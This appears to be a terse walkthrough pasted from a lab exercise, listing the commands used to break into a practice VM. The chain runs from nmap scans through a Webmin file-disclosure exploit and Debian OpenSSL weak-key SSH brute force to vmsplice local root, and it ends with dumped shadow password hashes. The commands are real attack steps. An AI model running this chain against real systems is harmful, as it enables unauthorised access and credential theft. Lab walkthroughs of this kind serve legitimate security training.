g0tmi1k

a guest Apr 1st, 2010 3,150 Never
nmap 192.168.3.1-255

nmap -sV -sS -O 192.168.3.100

firefox http://192.168.3.100

firefox http://192.168.3.100:10000

firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow

firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622        (perl)
http://milw0rm.com/exploits/5720        (python)
http://milw0rm.com/exploits/5632        (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)

wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys

tar jxvf debian_ssh_rsa_2048_x86.tar.bz2

cd rsa/2048

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw *.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ *.pub
*scans for the public key...*

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit

ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a

firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092         (c)
http://www.exploit-db.com/exploits/5092  (c)

nano vmsplice.c

gcc vmsplice.c -o vmsplice

./vmsplice

whoami

----------------------------------------------------------------------------------------------------
Users
root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------